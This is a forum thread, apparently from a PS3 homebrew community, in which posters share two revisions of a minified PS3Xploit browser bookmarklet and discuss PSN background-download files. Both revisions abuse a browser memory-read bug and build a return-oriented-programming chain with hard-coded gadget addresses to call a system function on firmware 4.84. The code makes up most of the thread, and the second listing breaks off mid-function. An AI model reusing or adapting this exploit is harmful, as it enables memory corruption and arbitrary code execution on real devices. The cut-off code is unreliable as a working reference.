PS3 Redirecting browser downloads to /dev_hdd0

Okay quick POC of something I mentioned in an earlier post:

1. Use method described by NewFile to background download pkg as png, save it as download.png
2. Make sure the dev_hdd0/packages directory exists on the hard drive
3. Run the script below; it renames download.png to download.pkg in dev_hdd0/packages
4. Install pkg from package manager

Code:
// Minified PS3Xploit bookmarklet ("PKG Renamer"): `javascript:eval('…')` evaluates one long string.
// Inside that string `\47`, `\74` and `\76` are octal escapes for `'`, `<` and `>` (e.g. hr="\74hr\76" is "<hr>").
// NOTE(review): the listing below is word-wrapped by the forum — one break falls inside the
// document.write() string and another splits the `===` of the jump_1 loop — so it is not runnable
// as pasted; it is kept byte-identical here.
//
// What the script does, as far as this listing shows:
//  - derives `fwv` from navigator.userAgent and, only when fwv=="4.84", overrides the address
//    constants (toc_addr, gadget*_addr, gadget_mod*_addr) with a second set; any other firmware
//    string keeps the defaults declared at the top.
//  - document.write() replaces the whole page with its own UI. The "auto_close" checkbox is the
//    only control read back (by rop_exit()). The `autoclose()`, `dex()` and `disable_trigger()`
//    handlers wired to the checkboxes/Reset button are NOT defined anywhere in this listing, so
//    those controls throw a ReferenceError when used.
//  - initROP() builds four strings (xtra_data, stack_frame, jump_2, jump_1) and locates each in
//    memory with findJsVariableOffset(): readMemory() sets exploit.style.src to
//    "local("+generateExploit(addr,len)+")" and checkMemory() reads the result back from
//    style.src.substr(6,…). Only when all four read back equal to the strings just built does it
//    call triggerX(); otherwise load_check() retries via setTimeout(initROP,1000,false), at most
//    max_loops (20) times, decrementing search_max_threshold per 2 MB window.
//  - the source path is "/dev_hdd0/photo/"+utc+"/download.png" and the destination
//    "/dev_hdd0/packages/download.pkg"; both are passed to syscall(0x0000032C, …). The page does
//    not say which call that number is — presumably the filesystem rename — confirm before relying on it.
//  - triggerX() schedules trigger(jump_1_addr) at 1 s and rop_exit()/window.close at 2 s; rop_exit()
//    closes the window only when auto_close is checked. Nothing here checks whether the rename
//    actually succeeded before closing.
//
// Things a maintainer should know:
//  - the entire body of initROP() sits in try{…}catch(e){} that swallows every error, so any
//    failure is silent; `debug` (=!1) only gates an identical return path in checkMemory().
//  - String.prototype.repeat is overridden with an Array-join version and toHex16/toAscii/convert/
//    convertedSize/replaceAt are added to String.prototype, plus Number.prototype.noExponents —
//    global monkey-patches that affect every other script on the page.
//  - search_size=2*mbytes is evaluated before mbytes=1048576 in the same `var` list, so it starts
//    as NaN; initDefaults() reassigns search_size=2*mbytes before first use, which is why it works.
//  - the `frame_fails%10` branch adds 0 to search_base_off and search_size_ext, i.e. it is a no-op as written.
//  - ps3xploit_ecdsa_key, index_key, vsh_ps3xploit_key_toc, sc_sm_shutdown, soft_reboot and memcpy()
//    are declared but not referenced by any function in this listing.
//  - the last statement, initROP(true), starts the search as soon as the bookmarklet runs.
javascript:eval('var xtra_data,stack_frame,jump_2,jump_1,xtra_data_addr,stack_frame_addr,jump_2_addr,jump_1_addr,debug=!1,ps3xploit_ecdsa_key="948DA13E8CAFD5BA0E90CE434461BB327FE7E080475EAA0AD3AD4F5B6247A7FDA86DF69790196773",index_key="DA7D4B5E499A4F53B1C1A14A7484443B",start_x="xxxx",offset_array=[],t_out=0,ps3xploit_ecdsa_key_addr=0,index_key_addr=0,search_max_threshold=73400320,search_base=2148532224,search_size=2*mbytes,search_base_off=0,search_size_ext=0,gtemp_addr=2365587456,total_loops=0,max_loops=20,frame_fails=0,sp_exit=2413354176,ffs=4294967295,dbyte41=16705,dbyte00=0,byte_size=1,hword_size=2,word_size=4,dword_size=8,mbytes=1048576,stat_size_offset=40,toc_addr=7296336,default_vsh_pub_toc=7263652,vsh_opd_patch=617820,vsh_opd_addr=7256936,vsh_ps3xploit_key_toc=7370612,toc_entry1_addr=7185360,toc_entry2_addr=7494200,toc_entry3_addr=7185352,toc_entry4_addr=7602176,toc_entry5_addr=7255744,toc_entry6_addr=0,gadget1_addr=620036,gadget2_addr=6332484,gadget3_addr=872540,gadget4_addr=2267192,gadget5_addr=1227548,gadget6_addr=6380604,gadget7_addr=131024,gadget8_addr=131072,gadget_mod1_addr=6352696,gadget_mod2_addr=80756,gadget_mod3_addr=757248,gadget_mod4a_addr=890500,gadget_mod7_addr=108204,gadget_mod8_addr=2862264,hr="\74hr\76",gadget12_addr=0x0C864C,sc_sm_shutdown=0x17B,soft_reboot=0x200,ua=navigator.userAgent,fwv=ua.substring(ua.indexOf("5.0 (")+19,ua.indexOf(") Apple")),utc=new Date().toJSON().slice(0,10).replace(/-/g,\47/\47);document.write(\47\74html\76\74head\76\74title\76PS3Xploit - PKG Renamer\74/title\76\74/head\76\74body id="bodyId" style="background-color:#FFFFFF"\76\74div id="headerId"\76\74h1\76Renaming PNG file to PKG...\74/h1\76\74span id="hideme" style="visibility:hidden"\76\74p\76\74button id="btnROP" type="button" onclick="initROP(true);" autofocus\76Initialize\74/button\76 | Close \74input type="checkbox" id="auto_close" name="aclose" checked="checked" onclick="autoclose();"/\76\74span id="dex_txt" style="visibility:hidden"\76\74input 
type="checkbox" id="dex" name="DEX" disabled="" onclick="dex();"/\76\74/span\76\74/p\76\74p\76\74button id="btnTrigger" disabled="" type="button" onclick="triggerX();"\76En\74/button\76\74span id="reset" style="visibility:hidden"\76 | \74button id="btnReset" type="button" onclick="disable_trigger();"\76Reset\74/button\76\74/span\76\74/p\76\74/span\76\74div id="exploit" \76\74/div\76\74div id="trigger"\76\74/div\76\74/body\76\74/html\76\47);if(fwv=="4.84"){var toc_addr=7296344,default_vsh_pub_toc=7263660,vsh_opd_patch=617820,vsh_opd_addr=7256944,vsh_toc_addr_screenshot=7472764,vsh_ps3xploit_key_toc=7370860,toc_entry1_addr=7185360,toc_entry2_addr=7494456,toc_entry3_addr=7185352,toc_entry4_addr=7602176,toc_entry5_addr=7255752,toc_entry6_addr=0,gadget1_addr=620036,gadget2_addr=6332644,gadget3_addr=872540,gadget4_addr=2267192,gadget5_addr=1227548,gadget6_addr=6380764,gadget7_addr=131024,gadget8_addr=131072,gadget9_addr=170760,gadget10_addr=6479908,gadget11_addr=5874864,gadget12_addr=820812,gadget13_addr=4777384,gadget14_addr=4769696,gadget15_addr=4758664,gadget_mod1_addr=6352856,gadget_mod2_addr=80756,gadget_mod3_addr=757248,gadget_mod4a_addr=890500,gadget_mod4b_addr=4376440,gadget_mod4c_addr=346864,gadget_mod5_addr=4339932,gadget_mod6_addr=134144,gadget_mod7_addr=108204,gadget_mod8_addr=2862264,gadget_mod9_addr=68384,gadget_mod10_addr=1857428,gadget_mod11_addr=1618244,gadget_mod12_addr=6500860,gadget_mod13_addr=3369072,gadget_mod14_addr=6502656,gadget_mod15_addr=3788856,gadget_mod16_addr=5206828}function hexh2bin(a){return String.fromCharCode(a)}function hexw2bin(a){return String.fromCharCode(a\76\7616)+String.fromCharCode(a)}function hexdw2bin(a){return hexw2bin(0)+hexw2bin(a)}String.prototype.toHex16=function(){return(\470000\47+this).substr(-4)};String.prototype.toAscii=function(a){var b=\47\47;var i=0;while(i\74this.length){if(a===true){b+=this.charCodeAt(i).toString(16).toHex16()}else{b+=this.charCodeAt(i).toString(16)}i+=1}return 
b};String.prototype.convert=function(a){if(this.length\741){return\47\47}var b=\47\47;var c=\47\47;var i=0;var d=[];if(a===true){b=this}else{b=this.toAscii()}while((b.length%4)!==0){b+=\4700\47}if(b.substr(b.length-3,2)!==\4700\47){b+=\470000\47}while(i\74b.length){c=b.substr(i,4);d.push(String.fromCharCode(parseInt(c,16)));i+=4}return d.join(\47\47)};String.prototype.convertedSize=function(a){if(this.length\741){return 0}var b=\47\47;if(a===true){b=this}else{b=this.toAscii()}while((b.length%4)!==0){b+=\4700\47}if(b.substr(b.length-3,2)!==\4700\47){b+=\470000\47}return b.length/2};String.prototype.replaceAt=function(a,b){return this.substr(0,a)+b+this.substr(a+b.length)};String.prototype.repeat=function(a){return new Array(a+1).join(this)};Number.prototype.noExponents=function(){var a=String(this).split(/[eE]/);if(a.length===1){return a[0]}var z=\47\47,sign=this\740?\47-\47:\47\47,str=a[0].replace(\47.\47,\47\47),mag=Number(a[1])+1;if(mag\740){z=sign+\470.\47;while(mag++){z+=\470\47}return z+str.replace(/^\-/,\47\47)}mag-=str.length;while(mag--){z+=\470\47}return str+z};function fromIEEE754(a,b,c){var d=0;var g=[];var i;var j;var h;for(i=a.length;i;i-=1){h=a[i-1];for(j=8;j;j-=1){g.push(h%2?1:0);h=h\76\761}}g.reverse();var k=g.join(\47\47);var l=(1\74\74(b-1))-1;var s=parseInt(k.substring(0,1),2)?-1:1;var e=parseInt(k.substring(1,1+b),2);var f=parseInt(k.substring(1+b),2);if(e===(1\74\74b)-1){d=f!==0?NaN:s*Infinity}else if(e\760){d=s*Math.pow(2,e-l)*(1+f/Math.pow(2,c))}else if(f!==0){d=s*Math.pow(2,-(l-1))*(f/Math.pow(2,c))}else{d=s*0}return d.noExponents()}function generateIEEE754(a,b){var c=new Array((a\76\7624)&0xFF,(a\76\7616)&0xFF,(a\76\768)&0xFF,(a)&0xFF,(b\76\7624)&0xFF,(b\76\7616)&0xFF,(b\76\768)&0xFF,(b)&0xFF);return fromIEEE754(c,11,52)}function generateExploit(a,b){var n=(a\74\7432)|((b\76\761)-1);return generateIEEE754(a,(n-a))}function 
readMemory(a,b){if(document.getElementById(\47exploit\47)){document.getElementById(\47exploit\47).style.src="local("+generateExploit(a,b)+")"}}function checkMemory(a,b,c){if(document.getElementById(\47exploit\47)){readMemory(a,b);if(debug===true){var x=document.getElementById(\47exploit\47).style.src.substr(6,c);return x}return document.getElementById(\47exploit\47).style.src.substr(6,c)}}function trigger(a){if(document.getElementById(\47trigger\47)){document.getElementById("trigger").innerHTML=-parseFloat("NAN(ffffe"+a.toString(16)+")")}}function rop_exit(a){var b=document.getElementById(\47auto_close\47);if(b){if(b.checked===true)window.close()}}function load_check(){if(total_loops\74max_loops){t_out=setTimeout(initROP,1000,false)}else{total_loops=0;t_out=0}}function findJsVariableOffset(a,b,c,d){readMemory(c,d);var e=document.getElementById(\47exploit\47).style.src.substr(6,d);var i=0;var t;var k;var f;var g;while(i\74(e.length*2)){if(e.charCodeAt(i/2)===b.charCodeAt(0)){f=0;for(k=0;k\74(b.length*2);k+=0x2){if(e.charCodeAt((i+k)/2)!==b.charCodeAt(k/2)){break}f+=1}if(f===b.length){g=c+i+4;for(t=0;t\74offset_array.length;t+=1){if(offset_array[t]===g){return-1}}offset_array.push(g);return g}}i+=0x10}var h=c+d;return 0}function memcpy(a,b,c){return callsub(gadget8_addr,a,b,c,0,0,0,0,0,0,0x70)}function store_word(a,b,c,d,e){if(c===null){c=gtemp_addr}if(d===null){d=gtemp_addr}if(e===null){e=gtemp_addr}return hexdw2bin(gadget_mod3_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(b)+fill_by_8bytes(0x8,dbyte41)+hexdw2bin(a-0xC74)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod7_addr)+fill_by_16bytes(0x70,dbyte41)+hexdw2bin(c)+hexdw2bin(d)+hexdw2bin(e)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function stack_frame_hookup(){return unescape("\u4141\u2A2F")+hexw2bin(gadget1_addr)+hexw2bin(toc_addr)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(toc_addr)+fill_by_16bytes(0x70,dbyte41)}function stack_frame_exit(){return hexdw2bin(gadget_mod8_addr)+unescape("\u2F2A")}function 
syscall(a,b,c,d,e,f,g,h,i,j){if(j===null){j=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(a)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod4a_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(j)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function callsub(a,b,c,d,e,f,g,h,i,j,k,l,m){var n=0x20;if(m===null){m=gtemp_addr}if(l===null){l=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(j)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(l)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(a)+fill_by_16bytes(k-n,dbyte00)+hexdw2bin(m)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function fill_by_4bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/4){c+=e.repeat(2);d++}return c}function fill_by_8bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/8){c+=e.repeat(4);d++}return c}function fill_by_16bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/16){c+=e.repeat(8);d++}return c}function 
initDefaults(){offset_array=[];xtra_data_addr=0;stack_frame_addr=0;jump_2_addr=0;jump_1_addr=0;ps3xploit_ecdsa_key_addr=0;index_key_addr=0;search_max_threshold=70*0x100000;search_base=0x80100000;search_size=2*mbytes;search_size_ext=0*mbytes;search_base_off=0*mbytes;total_loops++}function initROP(a){try{if(a===true){frame_fails=0;search_base_off=0;search_size_ext=0}if(t_out!==0){clearTimeout(t_out);t_out=0}initDefaults();var b="/dev_hdd0/photo/"+utc+"/download.png";var c="/dev_hdd0/packages/download.pkg";xtra_data=start_x.convert()+b.convert()+c.convert()+unescape("\uFD7E");while(xtra_data_addr===0){if(search_max_threshold\74search_size){load_check();return}xtra_data=xtra_data.replaceAt(0,hexh2bin(0x7EFD));xtra_data_addr=findJsVariableOffset("xtra_data",xtra_data,search_base,search_size);search_max_threshold-=search_size}var d=xtra_data_addr+0x2;var f=d+b.convertedSize();stack_frame=stack_frame_hookup()+syscall(0x0000032C,d,f,0,0,0,0,0,0)+stack_frame_exit();while(stack_frame_addr===0){if(search_max_threshold\74search_size+search_size_ext){frame_fails++;if((frame_fails%10)===0){search_base_off+=0;search_size_ext+=0}load_check();return}stack_frame=stack_frame.replaceAt(0,hexh2bin(0x2A2F));stack_frame_addr=findJsVariableOffset("stack_frame",stack_frame,search_base+search_base_off,search_size+search_size_ext);if(stack_frame_addr==-1)if(search_max_threshold\74search_size+search_size_ext){frame_fails++;load_check();return}search_max_threshold-=search_size+search_size_ext}jump_2=unescape("\u0102\u7EFB")+fill_by_16bytes(0x30,0x8282)+hexw2bin(stack_frame_addr)+unescape("\uFB7E");while(jump_2_addr===0){if(search_max_threshold\74search_size){load_check();return}jump_2=jump_2.replaceAt(0,hexh2bin(0x7EFB));jump_2_addr=findJsVariableOffset("jump_2",jump_2,search_base,search_size);if(jump_2_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}jump_1=unescape("\u4141\u7EFA")+hexw2bin(jump_2_addr)+unescape("\uFA7E");while(jump_1_addr==
=0){if(search_max_threshold\74search_size){load_check();return}jump_1=jump_1.replaceAt(0,hexh2bin(0x7EFA));jump_1_addr=findJsVariableOffset("jump_1",jump_1,search_base,search_size);if(jump_1_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}var g=checkMemory(stack_frame_addr-0x4,0x8000,stack_frame.length);var x=checkMemory(xtra_data_addr-0x4,0x1000,xtra_data.length);var h=checkMemory(jump_2_addr-0x4,0x1000,jump_2.length);var i=checkMemory(jump_1_addr-0x4,0x1000,jump_1.length);if((h===jump_2)&&(i===jump_1)&&(x===xtra_data)&&(g===stack_frame)){if(t_out!==0){clearTimeout(t_out)}triggerX()}else{load_check()}}catch(e){}}function triggerX(){setTimeout(trigger,1000,jump_1_addr);setTimeout(rop_exit,2000,hr);setTimeout(window.close,2000);t_out=0;total_loops=0}initROP(true);');

P.S. You can change the file names if you want; just leave everything else as is.
 
Can't you please add this feature to the HAN toolbox, like the offline HAN enabler? Can we download to the internal HDD? Is it possible?
 
If the package is served as a png then yes it is possible.

I have renamed .pkg to .PNG and downloaded it to my PS3 HDD, but what's next? How do I rename it back to .pkg from the internal HDD? There is no packages folder in my hdd0 folder (PS3 4.84 HFW).
 
I have renamed .pkg to .PNG and downloaded it to my PS3 HDD, but what's next? How do I rename it back to .pkg from the internal HDD? There is no packages folder in my hdd0 folder (PS3 4.84 HFW).

My post was just a POC to show it works, I am working on something more refined atm.
 
@DeViL303 I tested the Python scripts once again and got them working, so we can install the pdb files without an empty icon appearing on the XMB; the user can then reboot and the downloads will show up in the network column just like a PSN download. They may even show up without a reboot, not sure.
Cool. So you mean you perfected the "force install to" package method, with no blank space? That is great.

So I guess we need an exploit to copy to, or to create, a "package" folder in dev_hdd0/. I suppose a "force install to" could install the packages folder :)

There is a method here; it's just a matter of doing it in the cleanest way possible. Lots of possibilities.
 
Cool. So you mean you perfected the "force install to" package method, with no blank space? That is great.

So I guess we need an exploit to copy to, or to create, a "package" folder in dev_hdd0/. I suppose a "force install to" could install the packages folder :)

There is a method here; it's just a matter of doing it in the cleanest way possible. Lots of possibilities.

Yep, it seems like the most "complete" and convenient method, since we can use our own icons, titles, and we can also queue multiple downloads at once. It's also more reliable than an exploit that renames files, which has a chance to fail.

Yes, the packages folder can be created either with an exploit using sys_fs_mkdir or with the PKG file itself. I don't think this is how it works, though: using the bubble method the pkgs are stored somewhere in /dev_hd00/tmp/np or something like that while downloading, then they're transferred to somewhere in /dev_hdd0/vsh/task when the download is finished.

We will need some sample pdb files to do some more testing; if anyone could start a download from PSN, pause it, then grab the pdb files from /dev_hdd0/vsh/task and upload them here, I'd be extremely grateful. If not, I can grab them myself when I can.
 
Yep, it seems like the most "complete" and convenient method, since we can use our own icons, titles, and we can also queue multiple downloads at once. It's also more reliable than an exploit that renames files, which has a chance to fail.

Yes, the packages folder can be created either with an exploit using sys_fs_mkdir or with the PKG file itself. I don't think this is how it works, though: using the bubble method the pkgs are stored somewhere in /dev_hd00/tmp/np or something like that while downloading, then they're transferred to somewhere in /dev_hdd0/vsh/task when the download is finished.

We will need some sample pdb files to do some more testing; if anyone could start a download from PSN, pause it, then grab the pdb files from /dev_hdd0/vsh/task and upload them here, I'd be extremely grateful. If not, I can grab them myself when I can.
Well yes, true. I was mixing up methods there. We don't actually need any dev_hdd0/package folder when using bubbles. They download to dev_hdd0/tmp/np_pkg/ as far as I know; I'm not actually 100% sure. I know they go there when not being downloaded in the background, anyway.

I can try to get some bubbles going, but my main testing console is banned, so if someone else can grab some examples and upload them that would be easier.

Also see esc0rtd3w's project involving bubbles; he probably has most of the work done already.
 
Well yes, true. I was mixing up methods there. We don't actually need any dev_hdd0/package folder when using bubbles. They download to dev_hdd0/tmp/np_pkg/ as far as I know; I'm not actually 100% sure. I know they go there when not being downloaded in the background, anyway.

I can try to get some bubbles going, but my main testing console is banned, so if someone else can grab some examples and upload them that would be easier.

Also see esc0rtd3w's project involving bubbles; he probably has most of the work done already.

I just tested some pdb files posted in that psxhax thread with esc0rtd3w. The pkg installation works fine, but it requires a reboot to get the download to show up. The download never actually works, though; it keeps alternating between the downloading and pending states.

It could be an issue with the way I replaced the download link, not sure. Server logs show the file is not being accessed, and the URL is correct, so I don't know what the issue could be. If anyone knows more about this than I do, maybe @esc0rtd3w, please share your knowledge.
 
Well, I think the issue will be that placeholder I talked about. Normally when a download starts, the PS3 creates a placeholder file the exact size of the pkg; this is then filled in by the download, but it has the full size from the start, so we can't inject the file — we need to create it, either with an exploit or by triggering the normal OFW process of creating it.
 
Well, I think the issue will be that placeholder I talked about. Normally when a download starts, the PS3 creates a placeholder file the exact size of the pkg; this is then filled in by the download, but it has the full size from the start, so we can't inject the file — we need to create it, either with an exploit or by triggering the normal OFW process of creating it.
I completely forgot about that. Do you know the location and contents of the placeholder file? Is it all just null bytes?
 
I completely forgot about that. Do you know the location and contents of the placeholder file? Is it all just null bytes?
I think it must be all zeroes. I'm not actually sure; I would need to dump one.
 
I think it must be all zeroes. I'm not actually sure; I would need to dump one.
I can get it somewhat working, but we cannot just put our own pdb files on the PS3 like I thought. There must be some other file keeping track of all downloads, because if you don't start a download from PSN and use that as a base, the download will pend forever. This method looks more complicated than I first thought.
 
Well, the bubble stuff is a dead end; it doesn't work properly at all. I came up with another idea to manage downloads, though. I'm working on fixing some small bugs, but it works well for me so far.

Code:
// Minified PS3Xploit bookmarklet, second revision ("PKG Downloader"): `javascript:eval('…')`
// evaluates one long string in which `\47`, `\74` and `\76` are octal escapes for `'`, `<` and `>`.
// NOTE(review): the listing is word-wrapped by the forum (the `var` list and several `function`
// keywords are split from what follows them); it is kept byte-identical here.
//
// Differences from the "PKG Renamer" revision, as far as this listing shows:
//  - no auto-start: initROP(true) runs only from the "Rename file" button (id="init"). The
//    button is set disabled=true at the top of initROP() and nothing in this listing re-enables
//    it, so once load_check() gives up after max_loops (20) attempts the user has to reload the page.
//  - srv() builds the download link as "http://"+<srvip text>+"/package.png" by plain string
//    concatenation with no validation of the entered host:port, over unencrypted HTTP; the
//    file fetched from that host is what later gets renamed to a .pkg, so the server the user
//    points it at is fully trusted.
//  - the source path is "/dev_hdd0/photo/"+utc+"/package.png" and the destination
//    "/dev_hdd0/packages/download.pkg"; both go to syscall(0x0000032C, …), whose identity the
//    page does not state — presumably the filesystem rename — confirm before relying on it.
//  - rop_exit() now just alert()s "You can now install your PKG file!" 2 s after trigger();
//    nothing here checks the result of the syscall first, so the alert is shown even if the
//    rename failed. window.close is no longer scheduled.
//  - the `debug` flag, memcpy() and store_word() are gone; callsub() is still defined but not called.
//
// Carried over unchanged (see the earlier revision for detail):
//  - `fwv` comes from navigator.userAgent and only fwv=="4.84" swaps in the second address set.
//  - initROP() locates xtra_data/stack_frame/jump_2/jump_1 in memory via findJsVariableOffset(),
//    readMemory() and checkMemory() (exploit.style.src = "local("+generateExploit(addr,len)+")"
//    then style.src.substr(6,…)), retrying through load_check()/setTimeout(initROP,1000,false).
//  - the whole of initROP() is wrapped in try{…}catch(e){} that swallows every error.
//  - String.prototype.repeat is overridden and toHex16/toAscii/convert/convertedSize/replaceAt
//    plus Number.prototype.noExponents are added globally.
//  - search_size=2*mbytes is evaluated before mbytes=1048576 in the same `var` list (NaN at first);
//    initDefaults() reassigns it before use. The `frame_fails%10` branch adds 0 and is a no-op.
javascript:eval('var xtra_data,stack_frame,jump_2,jump_1,xtra_data_addr,stack_frame_addr,jump_2_addr,jump_1_addr,start_x="xxxx",offset_array=[],t_out=0,search_max_threshold=73400320,search_base=2148532224,search_size=2*mbytes,search_base_off=0,search_size_ext=0,gtemp_addr=2365587456,total_loops=0,max_loops=20,frame_fails=0,sp_exit=2413354176,ffs=4294967295,dbyte41=16705,dbyte00=0,byte_size=1,hword_size=2,word_size=4,dword_size=8,mbytes=1048576,stat_size_offset=40,toc_addr=7296336,gadget1_addr=620036,gadget_mod1_addr=6352696,gadget_mod2_addr=80756,gadget_mod3_addr=757248,gadget_mod4a_addr=890500,gadget_mod7_addr=108204,gadget_mod8_addr=2862264,hr="\74hr\76",ua=navigator.userAgent,fwv=ua.substring(ua.indexOf("5.0 (")+19,ua.indexOf(") Apple")),utc=new Date().toJSON().slice(0,10).replace(/-/g,\47/\47);document.write(\47\74html\76\74head\76\74title\76PS3Xploit - PKG Downloader\74/title\76\74/head\76\74body id="bodyId" style="background-color:#FFFFFF"\76\74h1\76PS3Xploit - PKG Downloader\74/h1\76\74b\76\74hr\76\74br\76Server IP (including port): \74input type="text" id="srvip" name="srvip" maxlength="20" size="20" oninput="srv()"\76\74br\76\74br\76Press triangle \74a href="" id="surl"\76here\74/a\76\74br\76Select File -> Save Target -> System Storage (Photo)\74br\76Click the button below once the download has completed\74/b\76\74br\76\74br\76\74input id="init" type="button" value="Rename file" onclick="initROP(true)"\76\74div id="exploit"\76\74/div\76\74div id="trigger"\76\74/div\76\74/body\76\74/html\76\47);if(fwv=="4.84"){var 
toc_addr=7296344,gadget1_addr=620036,gadget9_addr=170760,gadget10_addr=6479908,gadget11_addr=5874864,gadget13_addr=4777384,gadget14_addr=4769696,gadget15_addr=4758664,gadget_mod1_addr=6352856,gadget_mod2_addr=80756,gadget_mod3_addr=757248,gadget_mod4a_addr=890500,gadget_mod4b_addr=4376440,gadget_mod4c_addr=346864,gadget_mod5_addr=4339932,gadget_mod6_addr=134144,gadget_mod7_addr=108204,gadget_mod8_addr=2862264,gadget_mod9_addr=68384,gadget_mod10_addr=1857428,gadget_mod11_addr=1618244,gadget_mod12_addr=6500860,gadget_mod13_addr=3369072,gadget_mod14_addr=6502656,gadget_mod15_addr=3788856,gadget_mod16_addr=5206828}function srv(){document.getElementById("surl").href="http://"+document.getElementById("srvip").value+"/package.png"}function hexh2bin(a){return String.fromCharCode(a)}function hexw2bin(a){return String.fromCharCode(a\76\7616)+String.fromCharCode(a)}function hexdw2bin(a){return hexw2bin(0)+hexw2bin(a)}String.prototype.toHex16=function(){return(\470000\47+this).substr(-4)};String.prototype.toAscii=function(a){var b=\47\47;var i=0;while(i\74this.length){if(a===true){b+=this.charCodeAt(i).toString(16).toHex16()}else{b+=this.charCodeAt(i).toString(16)}i+=1}return b};String.prototype.convert=function(a){if(this.length\741){return\47\47}var b=\47\47;var c=\47\47;var i=0;var d=[];if(a===true){b=this}else{b=this.toAscii()}while((b.length%4)!==0){b+=\4700\47}if(b.substr(b.length-3,2)!==\4700\47){b+=\470000\47}while(i\74b.length){c=b.substr(i,4);d.push(String.fromCharCode(parseInt(c,16)));i+=4}return d.join(\47\47)};String.prototype.convertedSize=function(a){if(this.length\741){return 0}var b=\47\47;if(a===true){b=this}else{b=this.toAscii()}while((b.length%4)!==0){b+=\4700\47}if(b.substr(b.length-3,2)!==\4700\47){b+=\470000\47}return b.length/2};String.prototype.replaceAt=function(a,b){return this.substr(0,a)+b+this.substr(a+b.length)};String.prototype.repeat=function(a){return new Array(a+1).join(this)};Number.prototype.noExponents=function(){var 
a=String(this).split(/[eE]/);if(a.length===1){return a[0]}var z=\47\47,sign=this\740?\47-\47:\47\47,str=a[0].replace(\47.\47,\47\47),mag=Number(a[1])+1;if(mag\740){z=sign+\470.\47;while(mag++){z+=\470\47}return z+str.replace(/^\-/,\47\47)}mag-=str.length;while(mag--){z+=\470\47}return str+z};function fromIEEE754(a,b,c){var d=0;var g=[];var i;var j;var h;for(i=a.length;i;i-=1){h=a[i-1];for(j=8;j;j-=1){g.push(h%2?1:0);h=h\76\761}}g.reverse();var k=g.join(\47\47);var l=(1\74\74(b-1))-1;var s=parseInt(k.substring(0,1),2)?-1:1;var e=parseInt(k.substring(1,1+b),2);var f=parseInt(k.substring(1+b),2);if(e===(1\74\74b)-1){d=f!==0?NaN:s*Infinity}else if(e\760){d=s*Math.pow(2,e-l)*(1+f/Math.pow(2,c))}else if(f!==0){d=s*Math.pow(2,-(l-1))*(f/Math.pow(2,c))}else{d=s*0}return d.noExponents()}function generateIEEE754(a,b){var c=new Array((a\76\7624)&0xFF,(a\76\7616)&0xFF,(a\76\768)&0xFF,(a)&0xFF,(b\76\7624)&0xFF,(b\76\7616)&0xFF,(b\76\768)&0xFF,(b)&0xFF);return fromIEEE754(c,11,52)}function generateExploit(a,b){var n=(a\74\7432)|((b\76\761)-1);return generateIEEE754(a,(n-a))}function readMemory(a,b){if(document.getElementById(\47exploit\47)){document.getElementById(\47exploit\47).style.src="local("+generateExploit(a,b)+")"}}function checkMemory(a,b,c){if(document.getElementById(\47exploit\47)){readMemory(a,b);return document.getElementById(\47exploit\47).style.src.substr(6,c)}}function trigger(a){if(document.getElementById(\47trigger\47)){document.getElementById("trigger").innerHTML=-parseFloat("NAN(ffffe"+a.toString(16)+")")}}function rop_exit(a){alert("You can now install your PKG file!")}function load_check(){if(total_loops\74max_loops){t_out=setTimeout(initROP,1000,false)}else{total_loops=0;t_out=0}}function findJsVariableOffset(a,b,c,d){readMemory(c,d);var e=document.getElementById(\47exploit\47).style.src.substr(6,d);var i=0;var t;var k;var f;var 
